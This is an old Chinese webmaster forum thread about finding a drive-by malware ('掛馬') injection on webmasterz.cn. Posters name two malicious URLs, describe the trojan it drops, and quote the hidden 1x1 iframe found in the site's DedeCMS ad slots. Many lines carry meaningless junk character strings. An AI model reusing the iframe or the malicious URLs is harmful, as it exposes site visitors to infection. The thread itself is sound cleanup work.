webmasterz.cn上的掛馬掛在哪了 我怎麼查了半天查不到？

請老大仔細的查查吧，剛又發現了幾個，全是免殺的~~一個勁的往外蹦，但是我的卡卡即不報~~
2 \, j) A; z1 Vhttp://ppp.749571.com/dm/test.htm
: I& C" q5 J' J" I1 D) y. v6 whttp://www.985676.cn/encrypt/mm.htm
4 {" W5 m, I( R6 N. t" o這兩個是免殺的，還有幾個沒記下來，
5 w6 E2 s" A$ y: E- ?; y# F# U這掛馬的兔崽子有一手，隱藏的很好啊~~一般人都看不出來~

會在C盤下產生 CRESS1.EXE
* r8 N# M9 m: B9 d. g然後增加IE的BHO的木馬 還釋放驅動

昏 他藏得好隱秘  找到了 放毒得地方了
9 U2 t3 C0 M/ `6 ^8 }" X
4 W  n  ^! X; {" _) ?) siframe src=h t t p://w w w.9856 76.cn/encrypt/mm.htm width=1 height=1></iframe>
# l( j% G, p4 Y1 B% G& A' a然後再這個地址轉到ppp.749571.co m/dm/test.htm
8 x+ e% _5 g# w5 @  D8 ?- ?為了跟蹤這個病毒 自己失誤的。。。。哎。修復中ing。。。。
靜水趕快清理了吧

原帖由 20082008 於 2008-1-9 16:33 發表
沒裝REAL就沒事，好在我重新裝的系統:

8 ^% c9 f* p5 C) b說的沒錯

原帖由 freelzyr 於 2008-1-10 16:47 發表
. g  `0 c- }3 a6 r進dede後台
9 F% H3 g8 V; g+ ^: E檢查 ad_js.php?aid=1  
ad_js.php?aid=2
ad_js.php?aid=3
ad_js.php?aid=4
3 `! k9 r0 V! n% Q8 q
* N' M- ?3 Y& }* X% r  ?* U這幾個廣告 裡面的代碼
在這幾個 掉茅廁位 裡面   含有 木馬的 代碼

這個檢查了沒有的

原帖由 靜水流深 於 2008-1-11 02:27 發表
; @) H. w$ g$ j3 D
* ]9 V. ^( E/ S" J9 S6 J
這個檢查了沒有的

# ]+ H# L( F! [& q: W8 X, N( F# b& Q我看過了，有掛馬的代碼，代碼已經在你的另一個貼子裡貼出來了

原帖由 靜水流深 於 2008-1-11 02:27 發表
: ?- z1 ?2 J$ w: s/ G- `
+ {6 W4 f* L8 y2 X* u* W2 h
這個檢查了沒有的

木馬就是在這裡裡啊
, A! j! m4 N+ ^* T8 r0 i! b. K2 Q8 b在後台的掉茅廁位設置那
裡

現在明瞭.
有人收流量做ppp.749571.co m的..
最近被掛馬的話. 都改成js了. 不用iframe了

菜鳥,怕怕,不敢看,啥時好了說一聲,我再去看風景